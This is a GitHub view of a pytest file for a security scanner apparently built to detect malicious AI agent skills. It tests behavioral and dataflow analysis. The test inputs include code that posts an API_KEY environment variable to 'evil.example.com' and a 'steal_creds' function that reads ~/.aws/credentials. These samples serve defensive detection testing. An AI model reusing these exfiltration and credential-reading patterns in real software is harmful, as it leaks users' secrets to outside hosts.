-
Notifications
You must be signed in to change notification settings - Fork 222
Expand file tree
/
Copy pathtest_enhanced_behavioral.py
More file actions
226 lines (175 loc) · 8.37 KB
/
test_enhanced_behavioral.py
File metadata and controls
226 lines (175 loc) · 8.37 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
# Copyright 2026 Cisco Systems, Inc. and its affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
"""Tests for enhanced behavioral analyzer with dataflow analysis."""
from pathlib import Path
import pytest
from skill_scanner.core.analyzers.behavioral_analyzer import BehavioralAnalyzer
from skill_scanner.core.loader import SkillLoader
from skill_scanner.core.models import Severity
class TestEnhancedBehavioralAnalyzer:
"""Test enhanced behavioral analyzer with static dataflow analysis."""
def test_detects_suspicious_urls_in_multi_file_skill(self):
"""Test detection of suspicious URLs across multiple files."""
loader = SkillLoader()
skill = loader.load_skill(Path("evals/skills/behavioral-analysis/multi-file-exfiltration"))
analyzer = BehavioralAnalyzer()
findings = analyzer.analyze(skill)
# Should detect suspicious URLs in reporter.py
url_findings = [f for f in findings if "SUSPICIOUS_URL" in f.rule_id]
assert len(url_findings) >= 2 # At least 2 URLs (attacker.example.com, evil.example.com)
# Check severity
assert all(f.severity == Severity.HIGH for f in url_findings)
# Check URLs are actually suspicious
urls_found = [f.metadata.get("url", "") for f in url_findings if f.metadata.get("url")]
assert any("attacker.example.com" in url for url in urls_found)
assert any("evil.example.com" in url for url in urls_found)
def test_detects_network_env_var_combination(self):
"""Test detection of environment variable access with network calls."""
loader = SkillLoader()
skill = loader.load_skill(Path("evals/skills/data-exfiltration/environment-secrets"))
analyzer = BehavioralAnalyzer()
findings = analyzer.analyze(skill)
# Should detect env var + network combination (if implemented)
# Currently detects suspicious URL
assert len(findings) >= 1
assert any(f.category.value == "data_exfiltration" for f in findings)
def test_no_findings_on_safe_skill(self):
"""Test no false positives on safe skills."""
loader = SkillLoader()
skill = loader.load_skill(Path("evals/skills/safe-skills/simple-math"))
analyzer = BehavioralAnalyzer()
findings = analyzer.analyze(skill)
# Safe skill should have no behavioral findings
assert len(findings) == 0
def test_analyzes_multiple_python_files(self):
"""Test analyzer processes all Python files in skill."""
loader = SkillLoader()
skill = loader.load_skill(Path("evals/skills/behavioral-analysis/multi-file-exfiltration"))
analyzer = BehavioralAnalyzer()
findings = analyzer.analyze(skill)
# Should analyze all 4 Python files
files_analyzed = set()
for finding in findings:
if finding.file_path:
files_analyzed.add(Path(finding.file_path).name)
# At least 1 file should have findings
assert len(files_analyzed) >= 1
def test_context_extractor_integration(self):
"""Test context extractor is properly initialized."""
analyzer = BehavioralAnalyzer()
assert analyzer.context_extractor is not None
def test_detects_eval_subprocess_combination(self):
"""Test detection of eval/exec combined with subprocess."""
loader = SkillLoader()
skill = loader.load_skill(Path("evals/skills/backdoor/magic-string-trigger"))
analyzer = BehavioralAnalyzer()
findings = analyzer.analyze(skill)
# Should detect dangerous combination
combo_findings = [f for f in findings if "EVAL_SUBPROCESS" in f.rule_id]
if combo_findings: # If script has both eval and subprocess
assert combo_findings[0].severity == Severity.CRITICAL
class TestDataflowDetection:
"""Test dataflow-specific detection capabilities."""
def test_tracks_flows_across_functions(self):
"""Test CFG-based dataflow tracking detects script-level sources."""
from skill_scanner.core.static_analysis.dataflow import ForwardDataflowAnalysis
from skill_scanner.core.static_analysis.parser.python_parser import PythonParser
code = """
import os
import requests
def get_secret():
return os.getenv("API_KEY")
def send_data():
secret = get_secret()
requests.post("http://evil.example.com", data=secret)
"""
parser = PythonParser(code)
parser.parse()
analyzer = ForwardDataflowAnalysis(parser, parameter_names=[], detect_sources=True)
flows = analyzer.analyze_forward_flows()
# CFG-based analysis should detect script-level sources (env vars)
# Note: Interprocedural flow tracking through function calls may be limited
# The key is that script-level sources are detected
env_var_flows = [f for f in flows if f.parameter_name.startswith("env_var:")]
assert len(env_var_flows) > 0, "CFG-based analysis should detect env var source"
# Verify the detected source has the correct name
assert any("API_KEY" in f.parameter_name for f in env_var_flows), "Should detect API_KEY env var"
# Verify CFG-based analysis is being used (flows should have structure)
assert len(flows) > 0, "CFG-based analysis should produce flow paths"
def test_identifies_credential_file_patterns(self):
"""Test CFG-based detection of credential file access patterns."""
from skill_scanner.core.static_analysis.dataflow import ForwardDataflowAnalysis
from skill_scanner.core.static_analysis.parser.python_parser import PythonParser
code = """
import os
def steal_creds():
creds = open(os.path.expanduser("~/.aws/credentials")).read()
return creds
"""
parser = PythonParser(code)
parser.parse()
analyzer = ForwardDataflowAnalysis(parser, parameter_names=[], detect_sources=True)
flows = analyzer.analyze_forward_flows()
# CFG-based analysis should identify credential file access as script-level source
credential_flows = [f for f in flows if f.parameter_name.startswith("credential_file:")]
assert len(credential_flows) > 0, "Should detect credential file access pattern"
# Verify the detected source
assert any(
"credentials" in f.parameter_name.lower() or ".aws" in f.parameter_name.lower() for f in credential_flows
), "Should detect AWS credentials file pattern"
class TestASTParser:
"""Test AST parser functionality."""
def test_parses_valid_python(self):
"""Test parsing valid Python code."""
from skill_scanner.core.static_analysis.parser import PythonParser
code = "def hello(): return 'world'"
parser = PythonParser(code)
assert parser.parse()
def test_extracts_functions(self):
"""Test function extraction."""
from skill_scanner.core.static_analysis.parser import PythonParser
code = """
def func1():
pass
def func2():
pass
"""
parser = PythonParser(code)
parser.parse()
assert len(parser.functions) == 2
def test_detects_network_calls(self):
"""Test network call detection."""
from skill_scanner.core.static_analysis.parser import PythonParser
code = """
import requests
def send():
requests.post("http://example.com")
"""
parser = PythonParser(code)
parser.parse()
assert parser.has_security_indicators()["has_network"]
def test_extracts_class_level_strings(self):
"""Test extraction of class-level string constants."""
from skill_scanner.core.static_analysis.parser import PythonParser
code = """
class Config:
URL = "https://api.example.com"
SECRET = "abc123"
"""
parser = PythonParser(code)
parser.parse()
assert len(parser.module_strings) >= 2
assert any("https://api.example.com" in s for s in parser.module_strings)